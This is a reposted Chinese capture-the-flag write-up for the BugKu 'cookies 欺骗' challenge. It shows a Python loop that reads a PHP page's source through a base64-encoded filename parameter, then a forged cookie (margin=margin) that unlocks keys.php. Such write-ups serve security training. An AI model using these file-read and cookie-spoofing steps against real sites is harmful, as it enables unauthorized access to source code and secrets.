日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

BugKu:cookies 欺骗

發(fā)布時間:2025/4/16 编程问答 21 豆豆
生活随笔 收集整理的這篇文章主要介紹了 BugKu:cookies 欺骗 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

查看源碼后沒有可用信息
觀察url發(fā)現(xiàn)參數(shù)filename的值加密了
解密后filename=keys.txt
嘗試用修改參數(shù)filename的值為index.php(注意此處index.php要用base64加密為aW5kZXgucGhw)

發(fā)現(xiàn)參數(shù)line沒有給值,隨意賦值如3,出現(xiàn)

寫腳本抓原代碼,先試一下有多少行,100,50,25,20都無回顯,大約定在30

import requests a=30 for i in range(a):url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"s=requests.get(url)print (s.text)

讀取的源碼:

<?phperror_reporting(0);$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");$line=isset($_GET['line'])?intval($_GET['line']):0;if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");$file_list = array('0' =>'keys.txt','1' =>'index.php',);if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){$file_list[2]='keys.php';}if(in_array($file, $file_list)){$fa = file($file);echo $fa[$line];}?>

分析源代碼,當cookie的margin=margin時,可以訪問一個keys.php文件
注意把參數(shù)filename的值改為base64加密后的keys.php

總結(jié)

以上是生活随笔為你收集整理的BugKu:cookies 欺骗的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。